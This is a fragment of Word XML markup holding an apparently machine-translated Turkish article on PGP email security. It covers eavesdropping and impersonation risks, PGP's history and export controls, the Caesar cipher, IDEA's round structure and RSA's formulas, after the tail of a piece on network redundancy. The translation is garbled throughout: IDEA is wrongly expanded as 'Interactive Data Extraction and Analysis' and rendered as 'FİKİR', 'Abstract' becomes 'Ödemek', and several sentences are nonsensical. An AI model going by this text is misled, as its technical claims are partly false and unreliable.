        <w:t>Özetle, gelir getirici uygulamalarla aynı seviyede bir sistem sağlamak için şirketler, aynı anda ISP ve “Round Robin DNS” ile ikili bağlantılarla birleştirilmiş 5000 veya 6000 yönlendiriciye (veya eşdeğerine) yükseltmelidir. Yedek parçalar için depo düzenlemeleri yapılmalı, Southwestern Bell SecureNet ve T1 erişimini çeşitlendirmek için diğer yöntemler gibi hizmetler göz önünde bulundurulmalıdır. Bu tür önlemler, hızlı bir şekilde gelir getirici bir sistem haline gelecek olanlara ucuz bir sigorta sağlayacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>TAVSİYE EDİLEN EYLEM KURSU</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>Her ne kadar gelir getiren arama sistemleri birçok şirket için çok uzak gibi görünse de, deneyimler bunun gibi sistemlerin yakalanmanın bir yolunu olduğunu göstermektedir. Sigorta şirketleri, dial-in dizüstü bilgisayarlarla fitil talep ayarlayıcıları fikrine bayılıyor. Herkes evde çalışmak istiyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t xml:space="preserve">Ticaret internette canlanıyor. Bir başarısızlığın bir kuruluşun potansiyel olarak ticari açıdan zayıflatıcı bir sistemin korunmasına ayak uydurmaya çalışmanın reaktif modunda neredeyse kalıcı olması için istifa etmesinden sonra gelir etkisi yaşanmasını beklemek. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>Oldukça İyi Gizli</w:t>
      </w:r>
      <w:r>
        <w:t>lik Kullanarak E-posta Güvenliği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>Ödemek</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>Çoğu kullanıcı, E-posta iletilerinin tamamen herkese açık olduğunu ve başkaları tarafından izlenebileceğinin farkında değildir. Bu makalede, kullanıcıların gizli dinlemeden güvenli ve orijinal oldukları garanti edilen mesajları göndermelerini sağlayan bir E-posta güvenlik paketi olan Pretty Good Privacy açıklanmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>Giriş</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>Ticari posta veya kişisel iletişim için elektronik posta kullananlar dikkat etmelidir. Bir ağ üzerinden gönderilen mesajlar gizlice dinlenmeye maruz kalır. Mesajlar bir dosyada saklanırsa, aylarca hatta yıllarca sürebilir. Aynı zamanda kimliğe bürünme tehdidi de vardır ve bir mesajın, olduğunu iddia ettiği partiden gelmeyebilir. Koruma, güçlü, neredeyse kırılmaz ve kullanımı kolay bir paket sağlamak için gizliliği ve dijital imza özelliklerini birleştiren Phil Zimmermann tarafından geliştirilen bir E-posta güvenlik paketi olan Pretty Good Privacy (PGP) şeklinde mevcuttur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>PGP Tanımlı</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>Bu E-posta güvenlik programının en önemli özellikleri şunlardır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>· İnsanların gizlice dinlemekten korunan e-posta mesajları göndermesini sağlar. Sadece alıcı alıcı oldukça iyi bir gizlilik mesajı okuyabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>· İnsanların orijinal garantili e-posta mesajları göndermelerini sağlar. Alıcının, PGP mesajının, onu yarattığını iddia eden kişi tarafından yaratılması ve mesajı oluşturulduğundan beri hiç kimsenin değiştirmemesi sağlanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>· İnternette, birçok elektronik bülten panolarında ve CompuServe gibi çoğu ticari hizmette ücretsiz olarak bulunur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>· Disk isletim sistemi, Macintosh, UNIX, Amiga, OS / 2, VMS ve diger isletim sistemleri için versiyonlarda mevcuttur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>· Güvenli e-posta mesajları oluşturmak için herhangi bir e-posta paketi ile çalışır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>E-posta Riskleri</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>PGP, gizli dinleme tehlikesinden korunma sağlar. İnternet üzerinden gönderilen bir mesaj bir avuç posta ileticisinden ve düzinelerce paket değiştirme düğümünden geçebilir. Bir sistem yöneticisi veya bu aktarma noktalarından herhangi birine ayrıcalıklı erişim kazanmış biri bu mesajları okuyacak konumdadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>E-posta kullanıcıları saklayacak bir şeyleri olmadığını düşünmelerine rağmen, bir gün İnternet'i kullanan avukatlarına veya muhasebecilerine danışmak isteyebilirler veya İnternet üzerinden özel bilgi göndermek isteyen şirketler için çalışabilirler. Birçok kişi Internet'i zaten kişisel veya hassas mesajlar göndermek için kullanıyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>Endişelenecek bir sivil özgürlük sorunu da var. Hükümetin polis, istihbarat ve diğer güvenlik güçleri dijital ve bilgisayarlı e-posta mesajlarını kolayca izleyebilir, anahtar sözcükleri, adları ve değiş tokuş kalıplarını arayabilir. Herhangi bir kullanıcı masum bir şekilde böyle bir ağa yakalanabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>Mesajların doğruluğu başka bir potansiyel risk teşkil eder. Şebekenin kimliğe bürünmesini sağlayacak şekilde yanlış bir dönüş adresi içeren bir mesaj göndermeye zorlamak zor değildir. Bir mesajı yolu boyunca yakalamak, içeriği değiştirmek ve ardından yoluna göndermek de oldukça kolaydır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>Örneğin, bir kullanıcı İnternet'e bağlanan UNIX sistemi gibi paylaşılan bir sistemdeyse, taklit eden kişi sistemde “süper kullanıcı” ayrıcalıklarına sahip bir kişi olabilir. Böyle bir kişi, gelen ve giden tüm trafiği şüphesiz posta kutusundan özel bir dosyaya yönlendirebilir. Taklitçi, kullanıcı ve muhabir arasındaki tüm trafiğin geçmesi gereken bir yönlendiriciye, posta köprüsüne veya başka bir ağ geçidine de erişebilir. Bu kimliğe büründürücüler, postaları durdurmak ve sahte bir dönüş adresi içeren postalar göndermek ve göndermek için ağ geçidi üzerindeki ayrıcalıklı durumlarını kullanabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>PGP'nin Tarihçesi: Gizlilikle İlgili Sorun</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>PGP, sıradan vatandaşlar tarafından meşru sebeplerden dolayı kullanılabilecek meşru bir araçtır, ancak bazı kullanıcılar biraz şüpheli olduğunu düşünür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t xml:space="preserve">Phil Zimmerman 1980'lerde Pretty Good Privacy üzerinde çalışmaya başladı ve 1991'de ilk versiyonunu yayınladı. PGP'nin gelişmesi için en önemli motive edici faktörlerden biri FBI'nın belirli güvenlik algoritmalarını ve kuvvetlerini yasaklayacak bir yasanın geçişini güvence altına alma çabasıydı. bilgisayar üreticileri, devlet kurumları tarafından atlanabilecek e-posta güvenlik özelliklerini uygulamak için. Zimmerman bunu gizlilik ve özgürlük için bir tehdit olarak gördü. Bu nedenle PGP, e-posta gizliliğini ve özgünlüğünü sağlamak için ortalama bir kişi tarafından küçük bir sistemde kullanılabilecek bir paket olarak tasarlandı. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>· Bu algoritmaları, işletim sisteminden ve işlemciden bağımsız ve küçük, kullanımı kolay komutlar kümesine dayanan genel amaçlı bir uygulamaya entegre etmek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>· Kaynak kodu da dahil olmak üzere paketi ve belgelerini ücretsiz ve yaygın olarak kullanılabilir hale getirmek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>PGP şifreleme algoritması kullandığı için ihracat kontrollerine tabi tutulmuştur. Bir şifreleme algoritması, kullanıcıların bir mesajı yalnızca amaçlanan alıcının şifresini çözmesine izin verecek şekilde karıştırmasını sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Şifreleme algoritmaları ABD hükümeti tarafından silahlanma sınıfı olarak sınıflandırılmakta ve Uluslararası Silahlanma Yönetmeliği (ITAR) kapsamına girmektedir. ITAR, kullanıcıların silahları ihraç etmek için Dışişleri Bakanlığı'ndan ihracat lisansı almalarını gerektirir. Uygulamada</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Dışişleri Bakanlığı, güçlü şifreleme algoritmaları için bu tür bir lisans vermeyecek ve PGP en güçlerinden ikisini kullanmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>ABD’de PGP kullanımına karşı bir yasa bulunmadığından, bu sorunun ortalama bir kullanıcıyı ilgilendirmesine gerek yoktur. Ayrıca ABD dışında yasa dışı bir şekilde ihraç edilen bir ürünün kullanımını önlemek için ABD dışında bir kanun yoktur. Ayrıca, PGP'nin daha yeni sürümlerinden bazıları aslında ABD dışından kaynaklanmış ve problemi tamamen ortadan kaldırmıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>İkinci bir problemin patentlerle ilgisi var. PGP'deki iki şifreleme algoritmasından biri Rivest-Shamir-Adleman (RSA) olarak bilinir. ABD’de PGP kullanan herkes, bir süre için, potansiyel olarak Rivest_Shamir-Adleman patent ihlali için dava açacaktı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>Geleneksel Şifreleme</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>PGP iki güçlü güvenlik fonksiyonundan yararlanır: geleneksel şifreleme ve açık anahtarlı şifreleme. Geleneksel şifreleme, eski Roma’ya ve daha da eskilere dayanan gizli kodlara verilen klasik yaklaşımdır. Geleneksel bir şifreleme şeması (bkz. Ek 1) aşağıdaki beş bileşeni içermektedir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>· Düz metin. Bu, algoritmaya girdi olarak beslenen okunabilir mesaj veya veridir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>· Şifreleme algoritması. Şifreleme algoritması, düz metin üzerinde çeşitli ikameler ve dönüşümler gerçekleştirir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>· Gizli anahtar. Gizli anahtar ayrıca algoritmaya girdidir. Algoritma tarafından gerçekleştirilen tam ikameler ve dönüşümler anahtara bağlıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>· Şifreli Metin. Bu çıktı olarak üretilen şifreli mesajdır. Bu, düz metne ve gizli anahtara bağlıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>· Şifre çözme algoritması. Bu aslında şifreleme algoritmalarının tersine çalışmasıdır. Şifreyi ve aynı gizli anahtarı alır ve orijinal düz metni oluşturur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>Geleneksel Şifreleme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>Julius Caesar tarafından kullanılan Sezar şifresi, basit bir şifreleme örneğidir. Sezar şifresi, alfabenin her harfini, alfabenin altında üç basamakta d</w:t>
      </w:r>
      <w:r>
        <w:t>uran harfle değiştirir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00935068">
        <w:t xml:space="preserve">Alfabe, Z'yi takip eden harf A olacak şekilde etrafına sarılır. Şifre çözme algoritması, sadece şifreli metni alır ve her harfin, alfabenin önceki bölümlerinde yer aldığı harfle değiştirir. Genel bir Sezar şifresi, k'nin 1'den 25'e kadar değiştiği k harflerinin kaymasını içerir. Bu durumda, k, algoritmanın gizli anahtarıdır. Sezar şifresi çok güvenli değil. Kodu deşifre etmek isteyen herkes, 1'den 25'e kadar olan </w:t>
      </w:r>
      <w:r w:rsidRPr="00935068">
        <w:lastRenderedPageBreak/>
        <w:t>her olası geçişi deneyebilir. Pretty Good Privacy, Uluslararası Veri Şifreleme Algoritması veya Etkileşimli Veri Çıkarma ve Analizi olarak bilinen çok daha güçlü bir algoritma kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00935068">
        <w:t>Uluslararası Veri Şifreleme Algoritması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00935068">
        <w:t>IDEA, 1990 yılında İsviçre Federal Teknoloji Enstitüsü'nden Xuejia Lai ve James Massey tarafından geliştirilen blok odaklı geleneksel şifreleme algoritmalarıdır. IDEA şifrelemesi için genel şema Ek 2'de gösterilmektedir. IDEA, 64 bitlik bloklardaki verileri şifrelemek için 128 bitlik bir anahtar kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00935068">
        <w:t>Genel FİKİR Yapısı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00935068">
        <w:t>DEA algoritması, son bir dönüşüm fonksiyonunu takip eden sekiz tur veya yinelemeden oluşur. Algoritma, girişi dört adet 16 bitlik alt bloklara böler. Her yineleme turu, giriş olarak dört adet 16 bitlik alt blok alır ve dört adet 16 bitlik çıkış bloğu üretir. Son dönüşüm ayrıca 64 bit şifreleme metnini oluşturmak üzere birleştirilmiş dört adet 16 bit blok üretir. Her yinelemede altı adet 16 bitlik alt anahtar kullanılır, oysa son dönüşümde toplamda 52 adet alt anahtar için dört adet alt anahtar kullanılır. Serginin sağ tarafı, bu 52 alt anahtarın hepsinin orijinal 128 bit anahtarından üretildiğini gösterir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00935068">
        <w:t>Her IDEA yinelemesi, üç farklı matematiksel işlem kullanır. Her işlem, tek bir 16 bit çıktı üretmek için iki 16 bit giriş üzerinde ge</w:t>
      </w:r>
      <w:r>
        <w:t>rçekleştirilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Aynı zamanda birbirleriyle uyuşmuyorlar çünkü üç operasyondan hiçbiri ortak bir kanunu yerine getirmiyor. Örneğin:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Bu üç ayrı işlemin bir arada kullanılması, kriptanalizi çok zorlaştıran girdilerin karmaşık bir dönüşümünü sağlar. Sergi 3, tek bir yineleme için algoritmayı göstermektedir. Aslında, bu sergi ilk yinelemeyi göstermektedir. Daha sonraki yineleme işlemleri aynı yapıya sahiptir, ancak farklı alt anahtar ve düz metin türevli giriş ile. Yineleme, birleştiren bir dönüşümle başlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00935068">
        <w:t>Tek IDEA İterasyonu (İlk İterasyon)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Son olarak, üst dönüşümden dört çıkış bloğu, bu yineleme için dört çıkış bloğunu üretmek üzere XOR kullanarak MA yapısının iki çıkış bloğuyla birleştirilir. İkinci ve üçüncü girişler (X2 ve X3) tarafından kısmen üretilen iki çıkış, ikinci ve üçüncü çıkışların (W12 ve W13) üretilmesi için değiştirilir, böylece işlenen bitlerin karışımını arttırır ve algoritmayı kriptanalize karşı daha dirençli hale getirir. Algoritmanın dokuzuncu aşaması, Ek 2'deki çıktı dönüşüm aşamasını etiketledi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Tek fark, ikinci ve üçüncü girişlerin operasyonel birimlere uygulanmadan önce birbirleriyle değiştirilmeleridir. Bu, sekizinci yinelemenin sonunda değişimin geri alınması etkisine sahiptir. Bu ekstra değişim, şifre çözme işleminin şifreleme ile aynı yapıya sahip olması için yapılır. Bu dokuzuncu aşama, ilk sekiz aşamadan her biri için altı alt tuş girişi ile karşılaştırıldığında yalnızca dört alt anahtar girişi gerektirir. Her yineleme için alt anahtarlar, orijinal 128 bit anahtarındaki bir dizi vardiya tarafından üretilir. IDEA, eski geleneksel şifreleme tekniklerine göre avantajlara sahiptir. 128 bit anahtar uzunluğu, kaba kuvvet anahtar arama saldırılarına karşı dayanıklı olmasını sağlar. FİKİR de çok yüksek kriptanalize karşı dayanıklıdır ve hem yazılım hem de donanım uygulamalarını kolaylaştırmak için tasarlanmıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00935068">
        <w:t>Genel-Anahtar Şifreleme</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Etkileşimli Veri Çıkarma ve Analizin temel özelliklerinden biri ve tüm geleneksel şifreleme algoritmaları, iki tarafın kimsenin bilmediği bir gizli anahtarı paylaşma ihtiyacıdır. Bu, özellikle bir e-posta uygulaması için çok büyük bir sınırlamadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Oldukça İyi Gizlilik yalnızca IDEA'nın kullanımına bağlı olsaydı, bir kullanıcı herhangi biriyle temasa geçmeden önce, o kullanıcı bir şekilde mesaj alıcısıyla gizli bir 128-bitlik sayıyı paylaşmak zorunda kalacaktı. Güvenli iletişim kurmanın bir yolu yoksa, anahtarı göndermek zorlaşır. Genel anahtar şifreleme olarak bilinen şifrelemeye yeni bir yaklaşım bu soruna bir çözüm sunar. 1976 yılında Whitfield Diffie tarafından geliştirilen bu yöntemle, bir gizli anahtar iletmeye gerek yoktur. Bunun yerine, her bireyin özel bir anahtarı ve eşleşen bir ortak anahtarı vardır. Şifreleme bu iki anahtardan biriyle yapılır ve şifre çözme diğerini kullanır. Özel anahtar, sadece sahibinin bildiği gizli tutulur. Eşleşen ortak anahtar, sadece budur - genel. Özel anahtar sahibi, eşleşen ortak anahtarı yayınlayabilir. Açık anahtarlı şifreleme, gizliliği sağlamak için aynı şekilde kullanılabilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Kullanıcılar şifreleme algoritmalarına düz metin ve hedeflenen alıcının genel anahtarını koyarlar. Algoritma şifreli metin üretmek için düz metin ve genel anahtarı kullanır. Alıcı uçta, şifreleme algoritmalarının tersi olan şifre çözme algoritması kullanılır. Bu durumda, giriş şifreli metin ve alıcının özel anahtarıdır. Bu mesaj gizlice dinlemekten korunmaktadır, çünkü yalnızca alıcı şifre çözme için gerekli özel anahtara sahiptir. Alıcının genel anahtarının bir kopyasına sahip olan herkes sadece bu alıcı tarafından okunabilecek bir mesaj oluşturabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00935068">
        <w:t>Kimlik doğrulama, şifreleme algoritmalarına düz metin ve gönderenin özel anahtarını koyarak da yapılabilir. Algoritma, şifreli metin üretmek için düz metni ve özel anahtarı kullanır. Alma sonunda, kodun tersi olan şifre çözme algoritması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="0061698E">
        <w:t>RSA Algoritması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B32583">
        <w:t>İlk anahtar programlardan biri 1977'de MIT'de Ron Rivest, Adi Shamir ve Len Adleman tarafından geliştirildi ve ilk olarak 1978'de yayınlandı. Yaratıcıları için adlandırılan Rivest-Shamir-Adleman (RSA) programı o zamandan beri hüküm sürdü. yalnızca açık anahtarlı şifrelemeye yaygın olarak kabul edilen ve uygulanan bir yaklaşım. RSA, düz metin ve şifreli metnin bazı n'ler için 0 ile n - 1 arasında tam sayı olduğu bir blok şifredir. Şifreleme ve şifre çözme, bazı düz metin blok M ve şifreli metin blok C için aşağıdaki formu alır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF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C = M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">mod </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>M = C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">mod </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>= (M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
